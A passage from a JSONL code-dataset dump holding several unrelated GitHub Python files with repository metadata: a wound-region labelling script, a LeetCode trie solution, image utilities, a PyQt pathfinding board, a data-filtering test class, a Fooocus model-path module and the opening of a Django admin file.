line\n #\n # let x->y y->x to fit vertical line\n flist = np.polyfit(y, x, exponential_number)\n ########################################################\n # plot final line\n xret = np.polyval(flist, yvals).astype(int)\n xret [ xret < 0 ] = 0\n xret [ xret > xmax ] = xmax\n return flist, xret , y , x\n flist , x_l , sy_l, sx_l = mask_one_edge(left_edge_file, yvals,ymin, exponential_number ,W-1)\n #print(f'the left polyfit parameter is : {flist}',flush=True)\n linedf = pd.DataFrame()\n linedf['x'] = x_l\n linedf['y'] = yvals\n linedf['x'] = linedf['x']*3\n linedf['y'] = linedf['y']*3\n #linedf['y'] = yvals\n linedf.to_csv(f'{prefix}.left_line.csv',header=True,sep='\\t',index=False)\n flist , x_r , sy_r, sx_r = mask_one_edge(right_edge_file, yvals,ymin ,exponential_number,W-1)\n #print(f'the right polyfit parameter is : {flist}',flush=True)\n linedf = pd.DataFrame()\n linedf['x'] = x_l\n linedf['y'] = yvals\n linedf['x'] = linedf['x']*3\n linedf['y'] = linedf['y']*3\n #linedf['y'] = yvals\n linedf.to_csv(f'{prefix}.right_line.csv',header=True,sep='\\t',index=False)\n raw = base.copy()\n base[sy_l , sx_l, 1] = 255 \n base[sy_r , sx_r, 1] = 255 \n base[yvals, x_l, 0] = 255\n base[yvals, x_r, 0] = 255\n skio.imsave(f'{prefix}.edge.tif',base.astype('uint8'))\n\n labels = np.zeros((H,W),dtype='uint8')\n label_array = [0,1,2,3,4,5,6,7]\n if wound_only:\n label_array = [0,3,3,3,4,5,5,5]\n for i in range(len(yvals)):\n y_index = yvals[i]-ymin\n if x_l[y_index] != 0 and x_r[y_index] != 0 :\n labels[yvals[i], 0 : x_l[y_index] - ll ] = label_array[1]\n labels[yvals[i], x_l[y_index] - ll : x_l[y_index] ] = label_array[2]\n labels[yvals[i], x_l[y_index] : x_l[y_index] + lr ] = label_array[3]\n labels[yvals[i], x_l[y_index] + lr : x_r[y_index] - rl ] = label_array[4]\n labels[yvals[i], x_r[y_index] - rl : x_r[y_index] ] = label_array[5]\n labels[yvals[i], x_r[y_index] : x_r[y_index] + rr ] = label_array[6]\n labels[yvals[i], x_r[y_index] + rr : ] = label_array[7]\n elif x_l[y_index] != 0 and x_r[y_index] == 0 :\n labels[yvals[i], 0 : x_l[y_index] - ll ] = label_array[1]\n labels[yvals[i], x_l[y_index] - ll : x_l[y_index] ] = label_array[2]\n labels[yvals[i], x_l[y_index] : x_l[y_index] + lr ] = label_array[3]\n labels[yvals[i], x_l[y_index] + lr : ] = label_array[4]\n elif x_l[y_index] == 0 and x_r[y_index] != 0 :\n labels[yvals[i], : x_r[y_index] - rl ] = label_array[4]\n labels[yvals[i], x_r[y_index] - rl : x_r[y_index] ] = label_array[5]\n labels[yvals[i], x_r[y_index] : x_r[y_index] + rr ] = label_array[6]\n labels[yvals[i], x_r[y_index] + rr : ] = label_array[7]\n else:\n labels[yvals[i], : ] = label_array[4]\n\n label_all_df = pd.DataFrame()\n #raw = base.copy()\n base[:,:,:]=0\n\n label = np.where(labels==1)\n base[label[0],label[1],0] = 255 #draw 1 as red\n\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *1\n label_all_df = label_df \n\n label = np.where(labels==2)\n base[label[0],label[1],1] = 255 #draw 2 as green\n\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *2\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==3)\n base[label[0],label[1],0] = 255 #draw 3 as magenta \n base[label[0],label[1],2] = 255 #draw 3 as magenta \n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *3\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==4)\n base[label[0],label[1],0] = 255 #draw 4 as yellow\n base[label[0],label[1],1] = 255 #draw 4 as yelow\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *4\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==5)\n base[label[0],label[1],:] = 255 #draw 5 as white\n raw[y,x,:] = base[y,x,:]\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *5\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==6)\n base[label[0],label[1],1] = 255 #draw 6 as cyan \n base[label[0],label[1],2] = 255 #draw 6 as cyan \n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *6\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==7)\n base[label[0],label[1],0] = 255 #draw 7 as orange\n base[label[0],label[1],1] = 69 #draw 7 as orange\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *7\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n\n raw[y,x,:] = base[y,x,:]\n skio.imsave(f'{prefix}.class.tif',raw.astype('uint8'))\n\n pos_file_df = pd.read_csv(pos_file,sep=',',header=None)\n pos_file_df.columns = ['label','cell','x','y','z']\n pos_file_df['x'] = pos_file_df['x'] / 3\n pos_file_df['x'] = pos_file_df['x'].astype(int) \n pos_file_df['y'] = pos_file_df['y'] / 3\n pos_file_df['y'] = pos_file_df['y'].astype(int) \n\n output = pos_file_df.merge(label_all_df, on=['x' ,'y'])\n output['l'] = output['l'].astype(int)\n output.to_csv(f'{prefix}.class.csv',sep='\\t',columns=['label','cell','l'],index=None) \n\n########################################################\n# usage\n#\ndef usage():\n print(\"\"\"\nUsage\t: python3 BlastemaByWound.py < -p prefix>\n [ -o output prefix, default output]\n [ -e exponential number, default 2]\n [--only_wound yes/no, default no]\n [--ll left wound left extern distance, default 20]\n [--lr left wound right extern distance, default 20]\n [--rl right wound left extern distance, default 20]\n [--rr right wound right extern distance, default 20]\n\nNotice\t: the unit of distance is 3 micron, so the default 10 refer to 60 microns.\n\nExample : \n\t example 01: python3 BlastemaByWound.py -p 12hpa1 \n\t example 02: python3 BlastemaByWound.py -p WT -o test_WT\n\t example 02: python3 BlastemaByWound.py -p 5dpa1 -o test_5dpa1 -e 3\n example 03: python3 BlastemaByWound.py -p 3dpa1 -o test_3dpa1_lr15 --lr 15\n\nOutput label :\n 1 -- [red] left blastema\n 2 -- [green] left margin of left wound \n 3 -- [magenta] right margin of left wound \n 4 -- [yellow] body\n 5 -- [white] left margin of right wound\n 6 -- [cyan] right margin of right wound\n 7 -- [orange] right blastema\n\nOutput label in only_wound mode:\n 3 -- [magenta] left wound region, similar to 1+2+3 in blastema mode\n 4 -- [yellow] body\n 5 -- [white] right wound region, similar to 5+6+7 in blastema mode\n\"\"\",flush=True)\n\n########################################################\n# main\n#\ndef main(argv):\n ########################\n # no args equal to -h\n if len(argv) == 0 :\n usage()\n sys.exit(0)\n\n ########################\n # default values\n sample = ''\n prefix = 'output'\n ll = lr = rl = rr = 20\n exponential_number = 2\n wound_only = False\n ########################\n # parse args\n try:\n opts, args = getopt.getopt(argv,\"hp:o:\",[\"help\",\n \"ll=\",\n \"lr=\",\n \"rl=\",\n \"rr=\",\n \"only_wound=\",\n ])\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(0)\n elif opt in (\"-p\" ):\n sample = arg \n elif opt in (\"-o\" ):\n prefix = arg\n elif opt in (\"--ll\" ):\n ll = int(arg)\n elif opt in (\"--lr\" ):\n lr = int(arg)\n elif opt in (\"--rl\" ):\n rl = int(arg)\n elif opt in (\"--rr\" ):\n rr = int(arg)\n elif opt in (\"--only_wound\"):\n if arg == 'yes':\n wound_only = True\n\n ########################\n # sanity check\n #if sample not in [ '0hpa1','0hpa2','10dpa1','10dpa2','12hpa1','12hpa2','14dpa1','14dpa2','36hpa1', '36hpa2','3dpa1', '3dpa2', '5dpa1','5dpa2', '7dpa1' ,'7dpa2','WT' ]:\n # print(f'Error : invalid sample name : \\\" -s {sample}\\\"',flush=True)\n # usage()\n # sys.exit(1)\n\n ########################\n # do the job \n get_blastema(sample,prefix,ll,lr,rl,rr,exponential_number,wound_only)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n","repo_name":"BGI-Qingdao/4D-BioReconX","sub_path":"Other/assign_blastema_region/BlastemaByWound_v2.py","file_name":"BlastemaByWound_v2.py","file_ext":"py","file_size_in_byte":10735,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"32152670415","text":"from typing import Optional, List\n\nfrom utils import call_with_inputs\n\n\nclass MagicDictionary:\n \"\"\"\n https://leetcode.com/problems/implement-magic-dictionary/\n\n Return True if there is a word in the dictionary which differs in exactly one character, not more not less. Otherwise return False.\n \"\"\"\n\n def __init__(self):\n self.node = CharNode(None)\n\n def buildDict(self, dictionary: List[str]) -> None:\n for word in dictionary:\n self.node.insert(word)\n\n def search(self, searchWord: str) -> bool:\n return self.node.search(searchWord, 1)\n\n\nclass CharNode:\n\n def __init__(self, char: Optional[str]):\n if char is not None:\n self.char = char\n\n else:\n self.char = None\n\n self.char_dict = dict()\n self.is_final = False\n\n def insert(self, word: str):\n if len(word) == 0:\n self.is_final = True\n\n else:\n char = word[0:1]\n subword = word[1:]\n child = self.char_dict.get(char)\n if child is None:\n child = CharNode(char)\n self.char_dict[char] = child\n\n child.insert(subword)\n\n def search(self, word: str, remaining_edits: int):\n if len(word) == 0:\n return self.is_final and remaining_edits == 0\n\n else:\n char = word[0:1]\n subword = word[1:]\n\n child = self.char_dict.get(char)\n if child is not None and child.search(subword, remaining_edits):\n return True\n\n if remaining_edits > 0:\n for child_char, child in self.char_dict.items():\n if child_char != char and child.search(subword, remaining_edits - 1):\n return True\n\n return False\n\n\nmd = MagicDictionary()\ncall_with_inputs(md, [\"buildDict\", \"search\", \"search\", \"search\", \"search\"],\n [[[\"hello\", \"leetcode\"]], [\"hello\"], [\"hhllo\"], [\"hell\"], [\"leetcoded\"]],\n [None, False, True, False, False])\n","repo_name":"vackosar/coding-practice","sub_path":"magic_dictionary.py","file_name":"magic_dictionary.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"15800063531","text":"from scipy.misc import imread, imresize, imsave, fromimage, toimage\nfrom sklearn.feature_extraction.image import reconstruct_from_patches_2d, extract_patches_2d\nfrom PIL import Image\nimport numpy as np\nimport os\n\nfrom keras import backend as K\n\naspect_ratio = 0\nimg_WIDTH = img_HEIGHT = 0, 0\n\n\n# Util function to open, resize and format pictures into appropriate tensors\ndef preprocess_image(image_path, img_width=256, img_height=256, load_dims=False, resize=True, size_multiple=4):\n '''\n Preprocess the image so that it can be used by Keras.\n\n Args:\n image_path: path to the image\n img_width: image width after resizing. Optional: defaults to 256\n img_height: image height after resizing. Optional: defaults to 256\n load_dims: decides if original dimensions of image should be saved,\n Optional: defaults to False\n vgg_normalize: decides if vgg normalization should be applied to image.\n Optional: defaults to False\n resize: whether the image should be resided to new size. Optional: defaults to True\n size_multiple: Deconvolution network needs precise input size so as to\n divide by 4 (\"shallow\" model) or 8 (\"deep\" model).\n\n Returns: an image of shape (3, img_width, img_height) for dim_ordering = \"th\",\n else an image of shape (img_width, img_height, 3) for dim ordering = \"tf\"\n\n '''\n img = imread(image_path, mode=\"RGB\") # Prevents crashes due to PNG images (ARGB)\n if load_dims:\n global img_WIDTH, img_HEIGHT, aspect_ratio\n img_WIDTH = img.shape[0]\n img_HEIGHT = img.shape[1]\n aspect_ratio = img_HEIGHT / img_WIDTH\n\n if resize:\n if img_width < 0 or img_height < 0: # We have already loaded image dims\n img_width = (img_WIDTH // size_multiple) * size_multiple # Make sure width is a multiple of 4\n img_height = (img_HEIGHT // size_multiple) * size_multiple # Make sure width is a multiple of 4\n img = imresize(img, (img_width, img_height))\n\n if K.image_dim_ordering() == \"th\":\n img = img.transpose((2, 0, 1)).astype(np.float32)\n else:\n img = img.astype(np.float32)\n\n img = np.expand_dims(img, axis=0)\n return img\n\n\n# Util function to convert a tensor into a valid image\ndef deprocess_image(x):\n '''\n Removes the pre processing steps applied to image.\n\n Args:\n x: input image of shape (3, img_width, img_height) [th],\n or input image of shape (img_width, img_height, 3) [tf]\n denormalize_vgg: whether vgg normalization should be reversed\n\n Returns: image of same shape as input shape\n\n '''\n if K.image_dim_ordering() == \"th\":\n x = x.transpose((1, 2, 0))\n\n x = np.clip(x, 0, 255).astype('uint8')\n return x\n\n\n# Util function to preserve image color\ndef original_color_transform(content, generated):\n '''\n Applies the color space of content image to the generated image\n\n Args:\n content: input image of shape (img_width, img_height, 3)\n generated: input image of shape (img_width, img_height, 3)\n\n Returns: image of same shape as input shape\n\n '''\n generated = fromimage(toimage(generated), mode='YCbCr') # Convert to YCbCr color space\n generated[:, :, 1:] = content[:, :, 1:] # Generated CbCr = Content CbCr\n generated = fromimage(toimage(generated, mode='YCbCr'), mode='RGB') # Convert to RGB color space\n return generated\n\n\n# Util function to save intermediate images\ndef save_result(img, fname, img_width=None, img_height=None, preserve_color=False, content_img_path=None, directory=None):\n '''\n Save the resultant image\n\n Args:\n img: input image of shape (img_width, img_height, 3)\n fname: filename of output image\n img_width: resize dimension\n img_height: resize dimension\n preserve_color: whether to preserve original color of the content image\n content_img_path: path to content image. Optional, but required if color preservation is required\n directory: base directory where image will be stored\n\n '''\n if directory is not None:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n fname = directory + fname\n\n # We require original image if we are to preserve color in YCbCr mode\n if preserve_color:\n assert content_img_path is not None, \\\n \"If color is to be preserved, then content image path must be given as well.\"\n\n content = imread(content_img_path, mode=\"YCbCr\")\n if img_width is not None and img_height is not None:\n content = imresize(content, (img_width, img_height))\n img = original_color_transform(content, img)\n\n imsave(fname, img)\n\ndef _check_image(path, i, nb_images):\n '''\n Test if image can be loaded by PIL. If image cannot be loaded, delete it from dataset.\n\n Args:\n path: path to image\n i: iteration number\n nb_images: total number of images\n\n '''\n try:\n im = Image.open(path)\n im.verify()\n im = Image.open(path)\n im.load()\n if i % 1000 == 0: print('%0.2f percent images are checked.' % (i * 100 / nb_images))\n except:\n os.remove(path)\n print(\"Image number %d is corrupt (path = %s). Deleting from dataset.\" % (i, path))\n\ndef check_dataset(path):\n '''\n Use to check the dataset for any jpg corruptions.\n If there exists corruption in an image, then it is deleted.\n\n Note:\n If due to some reason the corrupted file cannot be deleted via os.remove(),\n it will print the path of the file. Please delete the file manually in such a case.\n\n Args:\n path: Path to the dataset of images\n '''\n from multiprocessing.pool import Pool\n pool = Pool()\n\n nb_images = len([name for name in os.listdir(path)])\n print(\"Checking %d images\" % nb_images)\n\n for i, file in enumerate(os.listdir(path)):\n pool.apply_async(_check_image, args=(path + \"\\\\\" + file, i, nb_images))\n\n if i % 1000 == 0: print('%0.2f percent images are added to queue.' % (i * 100 / nb_images))\n\n pool.close()\n pool.join()\n\n new_nb_images = len([name for name in os.listdir(path)])\n print()\n print(\"New size of dataset : %d. Number of images deleted = %d\" % (new_nb_images, nb_images - new_nb_images))\n\nif __name__ == \"__main__\":\n '''\n Run this script to check for corrupt images in an image dataset whose path is provided\n '''\n ms_coco_path = r\"\"\n\n '''\n Note:\n If due to some reason the corrupted file cannot be deleted via os.remove(),\n it will print the path of the file. Please delete the file manually in such a case.\n '''\n check_dataset(ms_coco_path)\n\n\n","repo_name":"titu1994/Fast-Neural-Style","sub_path":"img_utils.py","file_name":"img_utils.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"6"} +{"seq_id":"8566572759","text":"from PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtGui import QPainter, QPen\nfrom PyQt5 import QtCore\nfrom multiprocessing import Queue\nfrom threading import Timer, get_ident\nfrom algorithmHandler import AlgorithmHandler\nimport time\nimport constants\n\nclass DrawingBoard(QWidget):\n def __init__(self, obj):\n super().__init__(obj)\n\n self.cellWidth, self.cellHeight = 0, 0\n self.grid = None\n self.selectingStart = False\n self.selectingEnd = False\n self.selectingObstacles = False\n self.comms = None\n self.gridNeedsCleaning = False\n\n self.startPosition = None\n self.endPosition = None\n\n self.updateThreads = []\n\n self.sharedQueue = Queue()\n self.algorithmHandler = AlgorithmHandler(self.sharedQueue)\n\n def resizeEvent(self, event):\n super().resizeEvent(event)\n\n newWidth = self.width()\n newHeight = self.height()\n newCellWidth = newWidth // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n newCellHeight = newHeight // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n\n if newCellWidth != self.cellWidth or newCellHeight != self.cellHeight:\n self.cellWidth = newCellWidth\n self.cellHeight = newCellHeight\n # if self.comms: # if already exists\n # self.comms.print.emit(\n # \"[DrawingBoard] New Width: \" + str(newCellWidth) + \" new height: \" + str(newCellHeight))\n\n def toggleSelectStart(self):\n self.selectingStart = not self.selectingStart\n return self.selectingStart\n\n def toggleSelectEnd(self):\n self.selectingEnd = not self.selectingEnd\n return self.selectingEnd\n\n def toggleSelectObstacles(self):\n self.selectingObstacles = not self.selectingObstacles\n return self.selectingObstacles\n\n def setFullGrid(self):\n self.grid = []\n for j in range(self.cellHeight):\n row = []\n for i in range(self.cellWidth):\n row.append(0)\n self.grid.append(row)\n self.update()\n self.comms.print.emit(\n \"[DrawingBoard] Full Grid painting set Size: \" + str(self.cellWidth) + \" vs \" + str(self.cellHeight))\n \n def cleanFullGrid(self):\n self.gridNeedsCleaning = False\n for j in range(self.cellHeight):\n for i in range(self.cellWidth):\n if self.grid[j][i] > 3:\n self.grid[j][i] = 0\n self.update()\n self.comms.print.emit(\n \"[DrawingBoard] Full Grid cleaned\")\n\n def clearGrid(self):\n self.grid = None\n self.startPosition = None\n self.endPosition = None\n self.comms.print.emit(\"[DrawingBoard] Grid cleared\")\n self.update()\n\n def paintEvent(self, event):\n if self.grid is None: # When grid is null it returns painting blank\n return\n painter = QPainter()\n painter.begin(self)\n\n currGrid = self.grid[:]\n\n pen_1 = QPen(constants.CELL_COLLORS[0], constants.CELL_SIZE)\n pen_start = QPen(constants.CELL_COLLORS[1], constants.CELL_SIZE)\n pen_end = QPen(constants.CELL_COLLORS[2], constants.CELL_SIZE)\n pen_obstacles = QPen(constants.CELL_COLLORS[3], constants.CELL_SIZE)\n pen_seen = QPen(constants.CELL_COLLORS[4], constants.CELL_SIZE)\n pen_path = QPen(constants.CELL_COLLORS[5], constants.CELL_SIZE)\n\n for j in range(self.cellHeight):\n for i in range(self.cellWidth):\n currVal = currGrid[j][i]\n if currVal == 0:\n painter.setPen(pen_1)\n elif currVal == 1:\n painter.setPen(pen_start)\n elif currVal == 2:\n painter.setPen(pen_end)\n elif currVal == 3:\n painter.setPen(pen_obstacles)\n elif currVal == 4:\n painter.setPen(pen_seen)\n elif currVal == 5:\n painter.setPen(pen_path)\n\n xCoord = i * (constants.CELL_SIZE + constants.MIN_CELL_SPACING) + constants.MIN_CELL_SPACING + constants.CELL_SIZE // 2\n yCoord = j * (constants.CELL_SIZE + constants.MIN_CELL_SPACING) + constants.MIN_CELL_SPACING + constants.CELL_SIZE // 2\n\n painter.drawLine(xCoord, yCoord, xCoord, yCoord)\n\n painter.end()\n\n def mousePressEvent(self, event):\n self.handleMouseEvent(event)\n\n def mouseMoveEvent(self, event):\n self.handleMouseEvent(event)\n\n def setGridElem(self, coordX, coordY, val):\n self.grid[coordY][coordX] = val\n\n def handleMouseEvent(self, event):\n if self.grid is None:\n return\n\n if self.gridNeedsCleaning:\n self.cleanFullGrid()\n\n if event.buttons() and QtCore.Qt.LeftButton:\n cellNumX = event.pos().x() // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n cellNumY = event.pos().y() // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n\n if cellNumX >= self.cellWidth or cellNumY >= self.cellHeight or cellNumX < 0 or cellNumY < 0:\n # self.comms.print.emit(\"[DrawingBoard] Selected a Cell out of the drawn grid\")\n return\n\n gridElem = self.grid[cellNumY][cellNumX]\n\n if self.selectingStart:\n if gridElem != 0:\n self.comms.print.emit(\"[DrawingBoard] Cell not empty - Remove assignment first\")\n return\n self.selectingStart = False\n\n self.setGridElem(cellNumX, cellNumY, 1)\n\n if self.startPosition is not None:\n self.setGridElem(self.startPosition[0], self.startPosition[1], 0)\n\n self.startPosition = (cellNumX, cellNumY)\n\n self.update()\n self.comms.startSelected.emit()\n self.comms.print.emit(\n \"[DrawingBoard] Selected Start position: X: \" + str(cellNumX) + \" Y:\" + str(cellNumY))\n elif self.selectingEnd:\n if gridElem != 0:\n self.comms.print.emit(\"[DrawingBoard] Cell not empty - Remove assignment firsrt\")\n return\n self.selectingEnd = False\n\n self.setGridElem(cellNumX, cellNumY, 2)\n\n if self.endPosition is not None:\n self.setGridElem(self.endPosition[0], self.endPosition[1], 0)\n\n self.endPosition = (cellNumX, cellNumY)\n\n self.update()\n self.comms.endSelected.emit()\n self.comms.print.emit(\n \"[DrawingBoard] Selected End position: X: \" + str(cellNumX) + \" Y:\" + str(cellNumY))\n\n elif self.selectingObstacles:\n if gridElem != 0:\n # self.comms.print.emit(\"[DrawingBoard] Cell not empty - Remove assignment firsrt\")\n return\n\n self.setGridElem(cellNumX, cellNumY, 3)\n\n self.update()\n self.comms.print.emit(\n \"[DrawingBoard] Selected Obstacle position: X: \" + str(cellNumX) + \" Y:\" + str(cellNumY))\n\n def runAlgorithmPressed(self, byStep):\n if self.gridNeedsCleaning:\n self.cleanFullGrid()\n self.gridNeedsCleaning = True\n\n self.algorithmHandler.runAlgorithm(self.sharedQueue, self.grid, self.cellWidth, self.cellHeight, byStep)\n s = Timer(constants.DRAWING_UPDATE_TIMER, passiveWaitForAlgorithm, (self, 0))\n self.updateThreads.append(s)\n s.start()\n\n def joinProcessesAndThreads(self):\n self.comms.print.emit(\"[DrawingBoard] Waiting for threads to terminate\")\n for thread in self.updateThreads:\n thread.join()\n self.comms.print.emit(\"[DrawingBoard] Threads terminated. Going For processes\")\n self.algorithmHandler.joinProcesses()\n self.comms.algorithmEnd.clear()\n self.comms.algorithmInterrupt.clear()\n self.comms.print.emit(\"[DrawingBoard] Processes terminated.\")\n\n def setAlgorithmPressed(self):\n self.algorithmHandler.setAlgorithm(\"Dijkstra\")\n\n def initComms(self, comms):\n self.comms = comms\n self.algorithmHandler.initComms(comms)\n\n def update(self) -> None:\n super().update()\n\n\n#######################################################\n# Thread to be thrown to wait for drawings\n#######################################################\ndef passiveWaitForAlgorithm(drawingBoard: DrawingBoard, counter: int):\n update = None\n try:\n update = drawingBoard.sharedQueue.get(0)\n except Exception:\n update = None\n\n if drawingBoard.comms.algorithmInterrupt.is_set():\n drawingBoard.comms.print.emit(\n \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] Received AlgorithmInterrupt Signal - Iteration \" + str(\n counter))\n drawingBoard.comms.endParallelAlgorithmsAndThreads.emit()\n return\n if update is None:\n if drawingBoard.comms.algorithmEnd.is_set():\n drawingBoard.comms.print.emit(\n \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] Received AlgorithmEnd Signal - Iteration \" + str(\n counter))\n drawingBoard.comms.endParallelAlgorithmsAndThreads.emit()\n return\n drawingBoard.comms.print.emit(\n \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] did NOT draw \" + str(counter) + \" iteration\")\n else:\n drawingBoard.grid = update\n drawingBoard.update()\n # drawingBoard.comms.print.emit(\n # \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] drawing \" + str(counter) + \" iteration done\")\n\n s = Timer(constants.DRAWING_UPDATE_TIMER, passiveWaitForAlgorithm, (drawingBoard, counter + 1))\n drawingBoard.updateThreads.append(s)\n s.start()\n","repo_name":"hpnog/pathFindingProject","sub_path":"ui/drawingBoard.py","file_name":"drawingBoard.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30679650578","text":"# -*-coding:utf-8 -*\n\"\"\"Tests module.\n\"\"\"\nfrom configuration.config import SELECTED_CATEGORIES\n\n\nclass Tests:\n \"\"\"Tests class.\n \"\"\"\n def __init__(self):\n self.valid = False\n self.consistent_categories = []\n self.consistent_products = []\n self.unique_products = []\n\n def test_integer(self, value):\n \"\"\"Method that test if input is a number\n \"\"\"\n if value.isnumeric():\n self.valid = True\n else:\n self.valid = False\n return self.valid\n\n def test_string(self, value):\n \"\"\"Method that test if input is an alphabetic character\n \"\"\"\n if value.isalpha():\n self.valid = True\n else:\n self.valid = False\n return self.valid\n\n def test_categories_consistency(self, categories):\n \"\"\"Method that filter-in only OFF API categories that got values for\n id, name and url attributes.\n \"\"\"\n self.consistent_categories.clear()\n for category in categories:\n try:\n if category[\"id\"] in SELECTED_CATEGORIES and \\\n category[\"name\"] and category[\"url\"]:\n valid_category = (\n category[\"id\"], category[\"name\"], category[\"url\"])\n self.consistent_categories.append(valid_category)\n except KeyError:\n pass\n\n def test_products_consistency(self, products, category):\n \"\"\"Method that filter-in only OFF API products that got values for\n id, product_name, nutriscore_grade and url attributes.\n \"\"\"\n self.consistent_products.clear()\n for product in products:\n try:\n if product[\"id\"] and product[\"product_name\"] and \\\n product[\"nutriscore_grade\"] and product[\"url\"]:\n consistent_product = (\n product[\"id\"], product[\"product_name\"],\n product[\"nutriscore_grade\"], category.id_category,\n product[\"url\"], product[\"stores\"])\n self.consistent_products.append(consistent_product)\n except KeyError:\n pass\n self.test_products_duplicate()\n\n def test_products_duplicate(self):\n \"\"\"Method that filter-in only OFF API products that are\n unique per name and id_category.\n \"\"\"\n self.unique_products.clear()\n product_tuples_list = []\n for product in self.consistent_products:\n product_tuple = (product[1], product[3])\n if product_tuple not in product_tuples_list:\n product_tuples_list.append(product_tuple)\n self.unique_products.append(product)\n","repo_name":"ThomasPiergiovanni/oc_p5","sub_path":"verification/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26756947317","text":"import os\nfrom modules.model_loader import load_file_from_url\n\n\nmodelfile_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/checkpoints/'))\nlorafile_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/loras/'))\nvae_approx_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/vae_approx/'))\nupscale_models_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/upscale_models/'))\ninpaint_models_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/inpaint/'))\ntemp_outputs_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../outputs/'))\n\nfooocus_expansion_path = os.path.abspath(os.path.join(os.path.dirname(__file__),\n '../models/prompt_expansion/fooocus_expansion'))\n\nos.makedirs(temp_outputs_path, exist_ok=True)\n\ndefault_base_model_name = 'sd_xl_base_1.0_0.9vae.safetensors'\ndefault_refiner_model_name = 'sd_xl_refiner_1.0_0.9vae.safetensors'\ndefault_lora_name = 'sd_xl_offset_example-lora_1.0.safetensors'\ndefault_lora_weight = 0.5\n\nmodel_filenames = []\nlora_filenames = []\n\n\ndef get_model_filenames(folder_path):\n if not os.path.isdir(folder_path):\n raise ValueError(\"Folder path is not a valid directory.\")\n\n filenames = []\n for filename in os.listdir(folder_path):\n if os.path.isfile(os.path.join(folder_path, filename)):\n for ends in ['.pth', '.ckpt', '.bin', '.safetensors', '.fooocus.patch']:\n if filename.lower().endswith(ends):\n filenames.append(filename)\n break\n\n return filenames\n\n\ndef update_all_model_names():\n global model_filenames, lora_filenames\n model_filenames = get_model_filenames(modelfile_path)\n lora_filenames = get_model_filenames(lorafile_path)\n return\n\n\ndef downloading_inpaint_models():\n load_file_from_url(\n url='https://huggingface.co/lllyasviel/fooocus_inpaint/resolve/main/fooocus_inpaint_head.pth',\n model_dir=inpaint_models_path,\n file_name='fooocus_inpaint_head.pth'\n )\n load_file_from_url(\n url='https://huggingface.co/lllyasviel/fooocus_inpaint/resolve/main/inpaint.fooocus.patch',\n model_dir=inpaint_models_path,\n file_name='inpaint.fooocus.patch'\n )\n return os.path.join(inpaint_models_path, 'fooocus_inpaint_head.pth'), os.path.join(inpaint_models_path, 'inpaint.fooocus.patch')\n\n\nupdate_all_model_names()\n","repo_name":"powersimple/Fooocus","sub_path":"modules/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"34141223212","text":"from django.contrib import admin\nfrom apps.route.models import Route, Tag,RouteTag\nfrom .forms import RouteAdminForm\n\nclass CustomTag(admin.ModelAdmin):\n list_display = ('tag_name',)\n \n\nclass CustomRoute(admin.ModelAdmin):\n form = RouteAdminForm\n list_display = (\n \"title\",\n \"user_id\",\n \"level\",\n \"get_tags\",\n \"location\",\n \"get_description\",\n )\n \n @admin.display(description=\"tags\")\n def get_tags(self,obj):\n return \", \".join([tag.tag_name for tag in obj.tags.all()])\n\n @admin.display(description=\"description\")\n def get_description(self,obj):\n return obj.description[:50]+\"...\"\n \n \nclass CustomRouteTag(admin.ModelAdmin):\n list_display = (\n \"title\",\n \"tag\"\n )\n \n\nadmin.site.register(Tag, 